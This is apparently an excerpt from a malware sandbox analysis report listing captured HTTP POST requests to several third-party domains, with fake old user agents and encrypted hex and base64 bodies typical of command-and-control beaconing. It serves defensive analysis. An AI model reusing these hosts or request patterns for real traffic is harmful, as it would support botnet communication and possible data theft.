42 51 46 6f 6b 56 43 4d 51 62 35 78 63 36 50 30 41 4a 66 4d 4b 56 36 76 68 6f 31 52 52 39 6d 79 30 34 4c 41 2b 38 59 4a 6a 4b 47 53 6f 6e 35 4e 52 35 6e 54 41 41 65 35 54 64 6a 72 73 63 62 55 5a 56 71 56 67 4f 68 6b 65 52 51 31 74 45 78 77 4d 47 59 32 47 54 47 67 7a 54 6f 38 6c 30 6c 77 3d 3d Data Ascii: oRnXWafQ8c+I/gRvVhUohXDpdhodhlD0y5YmJHVqHYnPWfmVPZJqXNLBkvrqPAZa8W3tfSiMn1PNRsqHRAwz1kOqqS6LAOAJgyxiPkGClzLg7K4TMOevC+XbPZBspsGrdTpG3DNcb8t6SQ9thzlu+9JVU82dYAssAcuzeJOBOQcDQoWa9t3p8PTlp9Ul/ykutBBJjnYPV1n1gSjJ545zeRgAuCKl0BRfhGJhbV5/LHk/ryZCZ+yH4KnOGVlUBZ8/43d/Mix5y29t0O0+H1k/B5f0VChY5+AMk8CpxC+X9dBm+VCtg7YP+OCSaIb7hIR6AFTEx70jgAl4pLQuahRHmHxn5FcHTLbVrg5RGK7fpteNfyJoxXCApB99Cy/kii4+/cji6zXpo5Mhjg1rqKzKMGeK7JzXjRQgmAOUKphqa0WKOXgng12KSrqo8gbz66pDUNIdB1BQFokVCMQb5xc6P0AJfMKV6vho1RR9my04LA+8YJjKGSon5NR5nTAAe5TdjrscbUZVqVgOhkeRQ1tExwMGY2GTGgzTo8l0lw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tvtools.fiCache-Control: no-cacheData Raw: 47 6b 72 59 58 65 7a 78 38 63 2b 32 47 5a 5a 53 31 30 51 6f 30 76 2b 76 6d 61 42 45 6c 56 32 64 34 4f 6e 62 61 46 67 58 33 50 34 6e 58 49 79 5a 51 53 2f 79 41 6a 71 76 59 33 41 31 30 51 75 79 68 44 7a 4e 5a 78 66 69 4f 4f 4d 51 77 79 59 54 52 70 49 66 52 67 72 57 54 75 2f 58 39 56 6c 42 50 64 45 52 41 6b 66 4e 6e 75 35 6d 43 68 41 71 33 72 49 41 38 74 72 67 58 77 32 4e 4d 59 65 39 44 6e 33 63 42 48 48 67 6f 6c 41 35 67 51 77 4b 45 64 71 68 4b 33 73 34 64 55 39 51 42 6b 55 52 48 7a 33 66 48 6e 43 32 64 41 4d 38 4a 37 48 6f 65 46 62 6c 79 4e 6c 63 6b 56 6c 6b 78 5a 62 4d 48 72 30 33 6f 66 54 6e 58 4b 2b 36 59 41 61 56 7a 63 38 52 6c 33 37 6b 37 57 38 50 62 37 52 77 39 63 2b 70 4c 69 6c 4c 55 2f 4f 44 2b 59 36 2f 33 66 74 4f 69 62 61 71 37 30 79 54 46 42 2f 6d 55 30 70 7a 2b 6c 52 35 61 6b 64 4d 6a 53 48 2f 42 4e 52 67 6c 53 31 61 58 75 7a 4b 78 36 69 32 57 69 67 58 6b 55 63 59 46 4d 37 66 43 6e 7a 31 72 6b 62 31 63 33 53 67 2f 5a 78 72 42 70 61 78 41 6e 71 72 6c 74 4e 31 74 4a 47 58 49 31 50 56 2b 2b 37 33 37 72 5a 6f 55 4f 52 69 58 74 58 62 2f 39 54 43 32 48 49 45 34 4f 45 57 50 71 78 4b 64 44 68 6c 68 73 49 73 4a 56 64 5a 32 6d 4a 6f 6c 42 44 79 41 41 55 47 65 70 55 6d 4a 4b 44 46 66 71 56 37 6c 58 47 39 74 47 4a 58 43 59 6f 4c 51 44 42 63 38 73 54 64 56 67 48 54 32 59 37 2f 6a 4d 68 39 55 37 39 62 6e 70 79 75 2f 6d 44 64 65 65 6c 38 62 2b 4b 64 55 53 6f 39 2f 37 47 48 32 6f 35 4e 4b 77 4d 79 79 54 38 67 58 72 71 44 6b 73 76 54 6b 48 52 34 77 4b 70 65 70 4f 72 39 33 68 4b 77 53 63 54 58 45 64 63 75 5a 61 79 66 73 71 6d 61 4f 75 76 30 30 76 6c 49 52 4c 58 44 52 63 4a 79 62 6b 77 3d Data Ascii: GkrYXezx8c+2GZZS10Qo0v+vmaBElV2d4OnbaFgX3P4nXIyZQS/yAjqvY3A10QuyhDzNZxfiOOMQwyYTRpIfRgrWTu/X9VlBPdERAkfNnu5mChAq3rIA8trgXw2NMYe9Dn3cBHHgolA5gQwKEdqhK3s4dU9QBkURHz3fHnC2dAM8J7HoeFblyNlckVlkxZbMHr03ofTnXK+6YAaVzc8Rl37k7W8Pb7Rw9c+pLilLU/OD+Y6/3ftOibaq70yTFB/mU0pz+lR5akdMjSH/BNRglS1aXuzKx6i2WigXkUcYFM7fCnz1rkb1c3Sg/ZxrBpaxAnqrltN1tJGXI1PV++737rZoUORiXtXb/9TC2HIE4OEWPqxKdDhlhsIsJVdZ2mJolBDyAAUGepUmJKDFfqV7lXG9tGJXCYoLQDBc8sTdVgHT2Y7/jMh9U79bnpyu/mDdeel8b+KdUSo9/7GH2o5NKwMyyT8gXrqDksvTkHR4wKpepOr93hKwScTXEdcuZayfsqmaOuv00vlIRLXDRcJybkw=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 4c 62 51 46 58 4d 66 69 38 63 2b 70 52 63 77 75 39 73 47 42 55 5a 42 67 42 76 69 39 30 6a 41 41 36 2f 4b 72 35 51 50 6a 4b 5a 30 62 49 70 6a 4e 38 43 55 4b 39 32 7a 36 67 77 59 45 56 4e 77 48 45 57 75 54 2b 38 73 33 4c 75 64 45 69 32 79 30 77 63 35 76 43 34 70 45 31 4e 2b 71 65 67 32 37 76 4b 47 58 61 4c 69 70 43 79 31 68 47 43 4c 39 65 6c 7a 43 55 76 75 67 63 76 45 78 76 74 4d 48 34 74 41 49 76 69 39 7a 57 41 2b 64 74 70 4f 79 56 30 5a 4c 6d 48 4c 73 4a 72 56 76 6f 55 4d 46 36 49 63 6d 69 42 70 79 4c 48 6f 6e 69 54 4d 6c 75 57 4f 34 2f 66 78 68 44 31 37 42 71 63 72 72 76 52 48 6e 51 6e 45 45 4a 46 34 54 71 6e 6e 6e 71 50 53 4b 6b 44 54 4a 64 6b 66 74 57 70 6b 37 52 74 35 72 67 2f 6e 73 53 59 51 66 41 72 6c 53 46 33 47 52 51 74 38 49 63 4b 6b 52 37 67 64 77 55 78 53 58 69 5a 59 34 5a 4c 53 6f 49 68 59 72 4e 52 54 76 66 79 6a 51 79 2f 30 6c 42 55 44 72 4b 68 73 6d 44 6f 2b 64 65 6d 43 79 77 37 67 79 7a 61 79 64 4e 51 77 6c 76 58 39 78 48 4a 62 58 36 6c 49 79 77 66 46 38 76 61 43 65 68 36 57 4b 54 32 30 55 64 30 42 47 37 34 71 30 65 4d 42 71 42 4a 66 6e 77 61 76 36 2b 7a 61 46 49 37 37 70 64 62 54 7a 50 34 36 59 69 44 7a 67 35 52 59 63 6d 76 2b 52 46 2b 2f 37 4d 6f 56 59 2b 7a 76 70 61 2f 6c 59 4f 4b 30 63 6e 46 2b 55 77 76 44 6e 34 54 7a 33 71 38 67 50 74 75 35 73 32 4a 77 63 32 32 32 58 6e 6e 68 32 64 6c 2b 74 78 4e 4f 68 4e 7a 35 6f 30 53 37 4b 43 51 46 2b 61 65 38 74 4d 64 31 56 4d 47 6e 50 42 47 32 4e 6c 36 73 41 6c 61 37 35 52 30 34 55 72 6a 2f 53 32 77 57 50 53 79 61 7a 57 4a 45 69 31 37 6c 51 42 72 62 4b 2f 6d 54 6f 70 78 39 50 30 76 61 73 6a 5a 35 73 55 74 73 7a 49 6d 67 56 42 54 63 4d 79 69 4e 50 72 50 6b 56 6f 4c 50 4c 49 74 52 68 42 51 35 34 71 69 31 55 50 4f 52 33 54 66 71 46 4b 4e 58 73 42 77 3d 3d Data Ascii: LbQFXMfi8c+pRcwu9sGBUZBgBvi90jAA6/Kr5QPjKZ0bIpjN8CUK92z6gwYEVNwHEWuT+8s3LudEi2y0wc5vC4pE1N+qeg27vKGXaLipCy1hGCL9elzCUvugcvExvtMH4tAIvi9zWA+dtpOyV0ZLmHLsJrVvoUMF6IcmiBpyLHoniTMluWO4/fxhD17BqcrrvRHnQnEEJF4TqnnnqPSKkDTJdkftWpk7Rt5rg/nsSYQfArlSF3GRQt8IcKkR7gdwUxSXiZY4ZLSoIhYrNRTvfyjQy/0lBUDrKhsmDo+demCyw7gyzaydNQwlvX9xHJbX6lIywfF8vaCeh6WKT20Ud0BG74q0eMBqBJfnwav6+zaFI77pdbTzP46YiDzg5RYcmv+RF+/7MoVY+zvpa/lYOK0cnF+UwvDn4Tz3q8gPtu5s2Jwc222Xnnh2dl+txNOhNz5o0S7KCQF+ae8tMd1VMGnPBG2Nl6sAla75R04Urj/S2wWPSyazWJEi17lQBrbK/mTopx9P0vasjZ5sUtszImgVBTcMyiNPrPkVoLPLItRhBQ54qi1UPOR3TfqFKNXsBw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: __goc_session__=ietvmldvxeakytrdfhbatfsweopuymcoData Raw: 31 4b 79 74 58 74 76 34 38 63 2b 51 6b 70 36 66 38 74 68 43 67 73 51 6e 5a 4b 42 68 4e 4d 37 34 50 30 41 58 48 53 34 36 62 42 41 75 42 54 61 53 57 67 65 75 76 6f 2f 34 4a 2f 61 69 32 54 55 54 6b 4f 67 51 41 67 44 4d 65 44 43 53 36 39 73 75 7a 6e 71 6a 6f 43 30 4a 53 77 4f 65 48 4e 58 53 51 6c 48 4b 71 52 71 6f 63 2b 65 31 38 64 2f 74 56 45 46 38 4b 42 6e 57 49 72 54 76 53 44 62 46 2b 73 30 4b 32 65 58 4f 30 6f 6f 47 6f 6f 76 59 55 49 2f 62 6e 4a 78 43 65 78 54 6f 4d 45 59 41 48 7a 31 6f 45 64 45 7a 55 41 4e 44 71 62 61 31 49 49 67 54 56 2f 32 67 34 4e 6e 4e 2b 31 54 77 35 4f 54 6f 35 56 59 70 45 32 4e 67 41 7a 72 30 31 56 76 64 65 67 47 42 4b 31 54 4d 6e 4f 64 57 2b 74 6d 2f 76 47 41 79 6a 51 47 34 65 61 2f 4b 6b 34 63 42 75 71 44 33 56 57 52 77 4d 6b 6d 62 53 75 47 73 6c 4b 79 57 4e 53 76 48 6d 4f 68 43 5a 4f 30 34 30 75 73 71 58 51 77 63 42 43 55 47 78 32 34 4e 6b 54 6c 43 6b 53 4e 4e 64 54 6c 32 4d 6a 54 6d 59 6c 56 7a 53 43 58 38 56 76 72 32 66 54 48 49 73 44 57 66 75 37 72 6f 69 51 71 35 36 57 54 47 73 48 37 6b 37 75 54 76 72 44 41 69 36 69 30 49 2f 42 76 61 49 31 57 37 55 54 55 67 73 78 2b 76 6f 45 38 4b 30 41 6a 73 79 41 64 56 38 6a 52 4a 33 46 67 69 47 73 62 77 79 4d 2b 69 65 52 66 6f 49 61 58 42 6d 4b 6e 6c 52 31 78 4d 44 76 78 34 53 69 57 31 6e 44 2f 49 54 6c 66 6e 63 49 51 55 54 34 45 6e 48 6d 52 62 57 61 41 4f 2b 4c 67 4d 48 44 64 62 31 51 78 63 33 48 76 6b 48 4d 64 64 31 70 52 42 48 66 5a 59 6e 49 64 39 4f 50 45 33 72 47 32 50 39 6a 50 55 4f 76 73 39 7a 49 65 4f 63 47 31 73 32 37 6e 6b 78 51 75 47 5a 61 42 53 48 6c 6b 6b 78 79 6b 62 79 37 54 68 37 4d 45 44 34 64 6c 49 72 77 72 61 Data Ascii: 1KytXtv48c+Qkp6f8thCgsQnZKBhNM74P0AXHS46bBAuBTaSWgeuvo/4J/ai2TUTkOgQAgDMeDCS69suznqjoC0JSwOeHNXSQlHKqRqoc+e18d/tVEF8KBnWIrTvSDbF+s0K2eXO0ooGoovYUI/bnJxCexToMEYAHz1oEdEzUANDqba1IIgTV/2g4NnN+1Tw5OTo5VYpE2NgAzr01VvdegGBK1TMnOdW+tm/vGAyjQG4ea/Kk4cBuqD3VWRwMkmbSuGslKyWNSvHmOhCZO040usqXQwcBCUGx24NkTlCkSNNdTl2MjTmYlVzSCX8Vvr2fTHIsDWfu7roiQq56WTGsH7k7uTvrDAi6i0I/BvaI1W7UTUgsx+voE8K0AjsyAdV8jRJ3FgiGsbwyM+ieRfoIaXBmKnlR1xMDvx4SiW1nD/ITlfncIQUT4EnHmRbWaAO+LgMHDdb1Qxc3HvkHMdd1pRBHfZYnId9OPE3rG2P9jPUOvs9zIeOcG1s27nkxQuGZaBSHlkkxykby7Th7MED4dlIrwra
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 4c 62 51 46 58 4d 66 69 38 63 2b 70 52 63 77 75 39 73 47 42 55 5a 42 67 42 76 69 39 30 6a 41 41 36 2f 4b 72 35 51 50 6a 4b 5a 30 62 49 70 6a 4e 38 43 55 4b 39 32 7a 36 67 77 59 45 56 4e 77 48 45 57 75 54 2b 38 73 33 4c 75 64 45 69 32 79 30 77 63 35 76 43 34 70 45 31 4e 2b 71 65 67 32 37 76 4b 47 58 61 4c 69 70 43 79 31 68 47 43 4c 39 65 6c 7a 43 55 76 75 67 63 76 45 78 76 74 4d 48 34 74 41 49 76 69 39 7a 57 41 2b 64 74 70 4f 79 56 30 5a 4c 6d 48 4c 73 4a 72 56 76 6f 55 4d 46 36 49 63 6d 69 42 70 79 4c 48 6f 6e 69 54 4d 6c 75 57 4f 34 2f 66 78 68 44 31 37 42 71 63 72 72 76 52 48 6e 51 6e 45 45 4a 46 34 54 71 6e 6e 6e 71 50 53 4b 6b 44 54 4a 64 6b 66 74 57 70 6b 37 52 74 35 72 67 2f 6e 73 53 59 51 66 41 72 6c 53 46 33 47 52 51 74 38 49 63 4b 6b 52 37 67 64 77 55 78 53 58 69 5a 59 34 5a 4c 53 6f 49 68 59 72 4e 52 54 76 66 79 6a 51 79 2f 30 6c 42 55 44 72 4b 68 73 6d 44 6f 2b 64 65 6d 43 79 77 37 67 79 7a 61 79 64 4e 51 77 6c 76 58 39 78 48 4a 62 58 36 6c 49 79 77 66 46 38 76 61 43 65 68 36 57 4b 54 32 30 55 64 30 42 47 37 34 71 30 65 4d 42 71 42 4a 66 6e 77 61 76 36 2b 7a 61 46 49 37 37 70 64 62 54 7a 50 34 36 59 69 44 7a 67 35 52 59 63 6d 76 2b 52 46 2b 2f 37 4d 6f 56 59 2b 7a 76 70 61 2f 6c 59 4f 4b 30 63 6e 46 2b 55 77 76 44 6e 34 54 7a 33 71 38 67 50 74 75 35 73 32 4a 77 63 32 32 32 58 6e 6e 68 32 64 6c 2b 74 78 4e 4f 68 4e 7a 35 6f 30 53 37 4b 43 51 46 2b 61 65 38 74 4d 64 31 56 4d 47 6e 50 42 47 32 4e 6c 36 73 41 6c 61 37 35 52 30 34 55 72 6a 2f 53 32 77 57 50 53 79 61 7a 57 4a 45 69 31 37 6c 51 42 72 62 4b 2f 6d 54 6f 70 78 39 50 30 76 61 73 6a 5a 35 73 55 74 73 7a 49 6d 67 56 42 54 63 4d 79 69 4e 50 72 50 6b 56 6f 4c 50 4c 49 74 52 68 42 51 35 34 71 69 31 55 50 4f 52 33 54 66 71 46 4b 4e 58 73 42 77 3d 3d Data Ascii: LbQFXMfi8c+pRcwu9sGBUZBgBvi90jAA6/Kr5QPjKZ0bIpjN8CUK92z6gwYEVNwHEWuT+8s3LudEi2y0wc5vC4pE1N+qeg27vKGXaLipCy1hGCL9elzCUvugcvExvtMH4tAIvi9zWA+dtpOyV0ZLmHLsJrVvoUMF6IcmiBpyLHoniTMluWO4/fxhD17BqcrrvRHnQnEEJF4TqnnnqPSKkDTJdkftWpk7Rt5rg/nsSYQfArlSF3GRQt8IcKkR7gdwUxSXiZY4ZLSoIhYrNRTvfyjQy/0lBUDrKhsmDo+demCyw7gyzaydNQwlvX9xHJbX6lIywfF8vaCeh6WKT20Ud0BG74q0eMBqBJfnwav6+zaFI77pdbTzP46YiDzg5RYcmv+RF+/7MoVY+zvpa/lYOK0cnF+UwvDn4Tz3q8gPtu5s2Jwc222Xnnh2dl+txNOhNz5o0S7KCQF+ae8tMd1VMGnPBG2Nl6sAla75R04Urj/S2wWPSyazWJEi17lQBrbK/mTopx9P0vasjZ5sUtszImgVBTcMyiNPrPkVoLPLItRhBQ54qi1UPOR3TfqFKNXsBw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.elpro.siCache-Control: no-cacheData Raw: 63 6a 42 39 47 6d 39 69 41 4e 44 74 61 4f 4d 34 6a 69 32 44 6b 48 67 4b 4f 54 79 46 2f 34 58 59 45 35 6c 36 51 51 44 42 45 45 63 54 39 4a 69 6c 54 30 6b 39 77 73 5a 4d 63 2f 2f 32 43 37 30 56 65 35 2f 67 58 76 32 49 66 6d 35 46 48 67 4e 76 52 6d 70 54 6d 50 4a 51 37 5a 75 34 4d 71 5a 77 79 43 72 77 36 6c 52 4b 42 46 56 76 57 33 37 6d 6f 49 4c 4a 4a 4c 7a 33 72 44 4a 61 63 77 5a 59 4c 4f 53 70 4f 4c 5a 35 66 41 56 34 79 67 36 50 2f 4d 6a 45 51 6b 45 5a 79 41 6c 67 5a 63 58 33 76 41 75 32 70 6d 6b 36 75 67 33 51 74 30 4c 6d 67 6e 4a 6c 30 59 77 38 34 70 30 50 52 65 64 6a 68 5a 6d 53 4f 72 4d 76 55 33 4a 63 32 4e 75 43 41 64 56 63 73 59 4d 57 5a 38 6d 7a 30 64 53 70 57 5a 69 56 57 61 61 65 5a 6f 75 78 65 6b 4a 32 30 43 4d 66 47 46 5a 51 51 37 4b 4d 70 55 53 39 67 53 77 59 52 70 50 32 59 54 73 34 76 76 74 49 62 65 54 49 59 39 2f 77 57 53 55 75 61 4e 5a 62 31 32 64 74 52 4b 39 78 49 66 56 59 59 51 52 48 72 49 51 6f 65 4f 6b 73 69 64 53 65 4c 69 38 46 4a 2f 55 38 45 2b 6b 7a 31 73 34 78 72 37 4e 45 58 4f 6a 53 41 77 35 46 62 53 77 4e 45 70 65 2b 6d 52 69 57 41 53 4b 4b 6e 35 31 6c 59 59 4f 78 57 62 33 30 75 4c 41 56 59 7a 57 69 37 34 39 7a 6d 2b 67 58 63 73 2b 45 33 51 2f 2f 57 2f 57 43 50 4a 66 36 4b 68 78 6c 37 6c 6f 70 52 31 56 56 50 64 74 41 68 31 64 66 69 64 4b 65 4d 6b 65 66 73 47 50 4d 50 62 37 58 6d 49 52 37 4b 4a 63 41 76 58 33 30 74 62 35 69 4a 71 37 4d 4e 47 76 48 63 39 52 33 42 6b 30 2b 66 41 6e 2f 51 56 78 7a 79 6b 72 52 75 55 6d 78 5a 62 61 65 32 77 44 4c 6c 59 49 72 76 54 75 69 4d 56 48 7a 37 4c 44 64 59 74 58 61 4d 76 79 4f 45 4f 76 56 68 4c 7a 43 54 54 47 68 53 78 70 43 64 53 4d 30 4d 4b 47 44 76 65 66 6d 52 69 2b 61 66 44 75 59 44 6d 31 64 42 66 59 46 56 4a 35 39 2f 79 34 61 42 74 55 3d Data Ascii: cjB9Gm9iANDtaOM4ji2DkHgKOTyF/4XYE5l6QQDBEEcT9JilT0k9wsZMc//2C70Ve5/gXv2Ifm5FHgNvRmpTmPJQ7Zu4MqZwyCrw6lRKBFVvW37moILJJLz3rDJacwZYLOSpOLZ5fAV4yg6P/MjEQkEZyAlgZcX3vAu2pmk6ug3Qt0LmgnJl0Yw84p0PRedjhZmSOrMvU3Jc2NuCAdVcsYMWZ8mz0dSpWZiVWaaeZouxekJ20CMfGFZQQ7KMpUS9gSwYRpP2YTs4vvtIbeTIY9/wWSUuaNZb12dtRK9xIfVYYQRHrIQoeOksidSeLi8FJ/U8E+kz1s4xr7NEXOjSAw5FbSwNEpe+mRiWASKKn51lYYOxWb30uLAVYzWi749zm+gXcs+E3Q//W/WCPJf6Khxl7lopR1VVPdtAh1dfidKeMkefsGPMPb7XmIR7KJcAvX30tb5iJq7MNGvHc9R3Bk0+fAn/QVxzykrRuUmxZbae2wDLlYIrvTuiMVHz7LDdYtXaMvyOEOvVhLzCTTGhSxpCdSM0MKGDvefmRi+afDuYDm1dBfYFVJ59/y4aBtU=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abart.plCache-Control: no-cacheData Raw: 39 55 72 39 47 70 68 6d 41 4e 42 37 79 77 77 6d 6d 37 6b 73 2b 6f 75 42 73 74 56 67 39 57 49 50 54 44 4f 65 72 56 77 6a 67 4a 44 38 51 4d 6b 36 4c 41 30 4a 6c 48 49 38 46 47 61 6f 64 34 6e 2f 59 6c 68 4b 72 65 76 78 52 56 63 73 78 32 76 59 6e 6f 48 50 39 5a 4e 6e 52 48 71 54 47 5a 38 36 73 47 6e 55 4c 69 2b 64 4b 32 6e 52 6b 4a 53 4a 68 66 71 36 46 63 55 31 35 42 46 70 79 49 42 50 6b 74 30 65 32 56 76 51 37 42 52 59 2b 46 71 43 75 41 2b 68 50 4b 6e 4b 74 42 4f 73 38 7a 57 73 4a 57 75 4b 6b 4d 68 2b 4a 63 34 30 2f 33 41 4f 58 77 6f 4f 5a 56 67 43 43 37 31 36 63 75 55 6d 65 6a 44 6f 65 42 53 6d 4a 34 65 4c 61 38 6f 66 6c 30 36 55 39 4a 65 30 5a 37 35 66 69 46 64 37 35 7a 2f 4c 53 44 57 77 52 36 30 47 55 47 75 58 78 6b 71 6f 48 70 43 36 66 58 75 54 68 76 51 75 6d 63 4a 53 52 4b 66 69 2b 49 7a 72 44 31 72 74 73 58 6b 6b 57 50 39 63 62 4b 4e 41 72 74 56 33 64 54 52 34 35 53 36 32 4b 59 2b 61 51 76 6f 58 59 48 46 66 58 77 44 47 4b 70 32 32 68 2b 56 6d 65 33 52 7a 6f 7a 2f 79 4e 35 61 47 35 54 56 7a 64 7a 59 43 53 51 58 48 4f 72 2b 37 4e 55 33 78 54 54 42 35 4f 55 4b 53 4f 31 4a 6b 75 62 4e 31 77 66 52 6b 34 46 76 77 50 71 63 71 74 49 71 45 78 71 76 50 2f 50 30 30 4d 6e 44 58 61 67 53 64 2f 56 6b 32 62 39 64 72 49 4f 62 44 61 6e 74 47 6c 70 44 37 57 65 30 4b 54 46 4c 2b 43 64 34 6e 50 74 59 55 72 7a 49 64 38 67 6a 6f 6c 6c 4b 77 69 62 47 4b 54 4c 6c 2b 62 62 6c 46 55 57 4b 4e 61 66 4a 73 79 45 45 49 45 6f 58 75 4d 4a 42 57 72 56 61 6d 71 71 4e 36 62 71 6b 43 42 45 74 4a 69 55 42 65 46 66 4d 4d 51 2b 56 46 4c 49 5a 49 44 52 7a 32 62 62 45 49 45 70 52 4d 63 73 5a 33 4c 4e 73 51 70 62 4b 49 30 35 61 65 4b 63 50 33 43 71 79 77 55 79 33 61 51 68 64 55 4b 35 4a 70 4d 53 66 7a 73 4b 37 78 76 71 47 69 41 61 45 42 6c 36 76 61 4e 67 3d 3d Data Ascii: 9Ur9GphmANB7ywwmm7ks+ouBstVg9WIPTDOerVwjgJD8QMk6LA0JlHI8FGaod4n/YlhKrevxRVcsx2vYnoHP9ZNnRHqTGZ86sGnULi+dK2nRkJSJhfq6FcU15BFpyIBPkt0e2VvQ7BRY+FqCuA+hPKnKtBOs8zWsJWuKkMh+Jc40/3AOXwoOZVgCC716cuUmejDoeBSmJ4eLa8ofl06U9Je0Z75fiFd75z/LSDWwR60GUGuXxkqoHpC6fXuThvQumcJSRKfi+IzrD1rtsXkkWP9cbKNArtV3dTR45S62KY+aQvoXYHFfXwDGKp22h+Vme3Rzoz/yN5aG5TVzdzYCSQXHOr+7NU3xTTB5OUKSO1JkubN1wfRk4FvwPqcqtIqExqvP/P00MnDXagSd/Vk2b9drIObDantGlpD7We0KTFL+Cd4nPtYUrzId8gjollKwibGKTLl+bblFUWKNafJsyEEIEoXuMJBWrVamqqN6bqkCBEtJiUBeFfMMQ+VFLIZIDRz2bbEIEpRMcsZ3LNsQpbKI05aeKcP3CqywUy3aQhdUK5JpMSfzsK7xvqGiAaEBl6vaNg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 2b 63 45 72 73 65 6a 32 2f 4d 39 6b 46 38 35 6f 71 2b 31 50 73 31 75 4b 79 6c 6a 77 30 39 58 42 6e 43 43 30 6c 35 6e 2b 49 4e 46 69 61 4d 38 32 32 35 4a 6c 2b 38 36 46 38 76 74 73 57 6b 44 6e 30 64 72 36 45 66 75 33 66 74 33 6c 4d 4c 36 76 5a 79 4b 6e 4e 6f 77 35 6b 62 4b 54 4e 66 35 46 66 6f 5a 4b 78 55 49 67 67 55 38 2f 33 74 4b 4a 5a 65 2b 6a 65 45 48 76 4a 50 31 68 6e 56 4a 2f 71 31 7a 39 71 6a 4b 53 4b 6e 42 5a 43 32 38 55 45 72 47 78 4a 76 6d 61 59 37 4b 61 77 59 2b 41 34 74 52 4f 48 41 5a 79 6e 55 55 45 54 48 66 36 39 59 4f 63 41 49 39 75 42 79 54 45 33 75 57 62 4d 4e 4d 54 66 5a 65 51 62 63 79 5a 4a 59 37 35 76 67 63 2f 75 77 6b 5a 6e 48 72 71 44 36 74 67 52 36 68 6c 79 53 72 71 2b 2f 45 41 6d 6a 50 31 6b 58 72 6b 73 39 45 6c 76 45 4c 33 57 59 55 76 73 49 4b 70 42 52 72 44 68 78 51 53 7a 50 62 75 39 71 37 55 66 69 5a 6b 36 31 4c 64 55 76 4e 6d 69 4f 4d 46 30 75 5a 42 49 37 77 78 73 4a 69 6f 36 43 79 6c 44 71 79 49 41 35 72 64 32 54 46 31 66 4e 55 64 31 65 35 4b 6f 4c 6f 52 67 78 34 43 53 2b 4c 4f 4c 62 77 75 70 70 52 67 36 6e 57 37 32 52 57 4b 7a 44 2b 79 46 41 4e 69 6e 74 70 34 72 59 78 42 37 64 34 64 74 5a 69 61 32 48 42 50 79 65 61 52 47 36 42 41 48 66 38 71 4a 4b 51 43 4f 4b 67 30 64 37 79 67 44 56 4d 2f 75 69 67 6f 69 54 4d 41 66 35 46 68 47 4a 6b 6c 7a 4a 42 47 41 4e 75 51 70 2f 55 47 44 75 69 61 75 63 6c 63 49 5a 4e 38 50 4e 73 6e 78 49 50 58 58 49 36 31 65 74 4d 2b 50 52 32 61 65 64 2f 6f 57 77 6e 33 47 70 38 2b 44 62 4f 6e 2b 6c 57 63 38 45 57 2f 53 4c 57 4a 6e 34 2b 62 54 49 50 2f 48 65 67 71 32 75 39 4d 31 38 43 53 6e 61 6c 63 30 39 72 65 7a 46 35 31 2b 73 56 48 6d 41 35 38 75 48 35 4f 70 65 57 78 70 50 61 68 76 66 77 73 31 67 49 6a 78 78 44 35 6b 72 4b 57 67 4f 66 6e 57 52 41 6c 79 43 35 67 39 41 3d 3d Data Ascii: +cErsej2/M9kF85oq+1Ps1uKyljw09XBnCC0l5n+INFiaM8225Jl+86F8vtsWkDn0dr6Efu3ft3lML6vZyKnNow5kbKTNf5FfoZKxUIggU8/3tKJZe+jeEHvJP1hnVJ/q1z9qjKSKnBZC28UErGxJvmaY7KawY+A4tROHAZynUUETHf69YOcAI9uByTE3uWbMNMTfZeQbcyZJY75vgc/uwkZnHrqD6tgR6hlySrq+/EAmjP1kXrks9ElvEL3WYUvsIKpBRrDhxQSzPbu9q7UfiZk61LdUvNmiOMF0uZBI7wxsJio6CylDqyIA5rd2TF1fNUd1e5KoLoRgx4CS+LOLbwuppRg6nW72RWKzD+yFANintp4rYxB7d4dtZia2HBPyeaRG6BAHf8qJKQCOKg0d7ygDVM/uigoiTMAf5FhGJklzJBGANuQp/UGDuiauclcIZN8PNsnxIPXXI61etM+PR2aed/oWwn3Gp8+DbOn+lWc8EW/SLWJn4+bTIP/Hegq2u9M18CSnalc09rezF51+sVHmA58uH5OpeWxpPahvfws1gIjxxD5krKWgOfnWRAlyC5g9A==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.otena.comCache-Control: no-cacheData Raw: 71 52 2b 36 65 58 50 4b 43 39 44 43 4e 65 46 30 75 67 33 74 52 42 77 68 41 6e 72 5a 49 56 32 32 56 32 65 76 34 4d 6c 6f 32 49 44 6c 71 5a 64 42 73 45 6b 4b 65 6a 62 48 41 42 58 55 2b 33 6d 38 4c 34 76 45 45 65 2f 70 42 6e 46 30 6d 65 33 6e 65 2b 65 35 56 4f 2f 32 31 59 70 6c 2f 2f 46 53 52 44 49 79 45 6b 32 63 37 62 62 75 70 78 6a 64 72 67 4b 4a 31 74 2f 6f 74 